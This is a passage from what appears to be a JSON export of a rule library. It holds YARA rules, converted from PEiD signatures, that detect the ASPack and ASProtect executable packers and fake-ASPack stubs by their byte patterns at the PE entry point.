at pe.entry_point\r\n\r\n}\r\nrule ASPack_2xwithouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 
60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 40 1C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1061b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 6E AD 43 00 00 75 15 FE 85 6E AD 43 00 E8 1D 00 00 00 E8 73 02 00 00 E8 0A 03 00 00 8B 85 70 AD 43 00 03 85 84 AD 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 61 75 08 B8 01 C2 0C 68 C3 8B 85 26 04 8D 8D 3B 04 51 50 FF }\r\n        $b = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_10801_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? 
90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 00 00 75 15 FE 85 9C 2E 44 00 E8 1D 00 00 00 E8 E4 01 00 00 E8 7A 02 00 00 8B 85 9D 2E 44 00 03 85 B1 2E 44 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_103b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED AE 98 43 00 B8 A8 98 43 00 03 C5 2B 85 18 9D 43 00 89 85 24 9D 43 00 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 
80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_1061b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 
AD 43 00 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 48 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_106b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB }\r\n        $b = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v2001: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB 33 87 DB }\r\n        $b = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D BB 03 }\r\n        $b = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED B8 03 C5 2B 85 0B DE 89 85 17 DE 80 BD 01 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10801: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 44 BB 10 44 03 DD 2B }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10802: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 ?? BB 10 6A 44 ?? 03 DD 2B 9D }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 4A 44 ?? BB 04 4A 44 ?? 
03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 D9 43 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 F9 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212withouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 
E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10803_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 FF }\r\n        $b = { 90 75 01 FF E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 
EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 ?? }\r\n        $b = { 90 90 90 75 00 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v104b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_V22_Alexey_Solodovnikov_StarForce_2009408: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD ?? ?? ?? ?? ?? ?? 83 BD 7D 04 00 00 00 89 9D 7D 04 00 00 0F 85 C0 03 00 00 8D 85 89 04 00 00 50 FF 95 09 0F 00 00 89 85 81 04 00 00 8B F0 8D 7D 51 57 56 FF 95 05 0F 00 00 AB B0 00 AE 75 FD 38 07 75 EE 8D 45 7A FF E0 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 56 69 72 74 75 61 6C 46 72 65 65 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 8B 9D 8D 05 00 00 0B DB 74 0A 8B 03 87 85 91 05 00 00 89 03 8D B5 BD 05 00 00 83 3E 00 0F 84 15 01 00 00 6A 04 68 00 10 00 00 68 00 18 00 00 6A 00 FF 55 51 89 85 53 01 00 00 8B 46 04 05 0E 01 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 55 51 89 85 4F 01 00 00 56 8B 1E 03 9D 7D 04 00 00 FF B5 53 01 00 00 FF 76 04 50 53 E8 2D 05 00 00 B3 00 80 FB 00 75 5E FE 85 E9 00 00 00 8B 3E 03 BD 7D 04 00 00 FF 37 C6 07 C3 FF D7 8F 07 50 51 56 53 8B C8 83 E9 06 8B B5 4F 01 00 00 33 DB 0B C9 74 2E 78 2C AC 3C E8 74 0A EB 00 3C E9 74 04 43 49 EB EB 8B 06 EB 00 ?? ?? ?? 
75 F3 24 00 C1 C0 18 2B C3 89 06 83 C3 05 83 C6 04 83 E9 05 EB CE 5B 5E 59 58 EB 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n        $b = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED D2 2A 44 B8 CC 2A 44 03 C5 2B 85 A5 2E 44 89 85 B1 2E 44 80 BD 9C 2E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 96 78 43 B8 90 78 43 03 C5 2B 85 7D 7C 43 89 85 89 7C 43 80 BD 74 7C }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 
89 44 24 1C 61 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v108x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v105b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_211_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 ?? ?? 00 83 BD 22 04 00 00 00 89 9D 22 04 00 00 0F 85 65 03 00 00 8D 85 2E 04 00 00 50 FF 95 4C 0F 00 00 89 85 26 04 00 00 8B F8 8D 5D 5E 53 50 FF 95 48 0F 00 00 89 85 4C 05 00 00 8D 5D 6B 53 57 FF 95 48 0F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 
80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 112,
            "key": "yara_detect_asprotect",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Asprotect",
            "rule": "rule ASProtect_v123_RC1: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_130824_beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 89 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
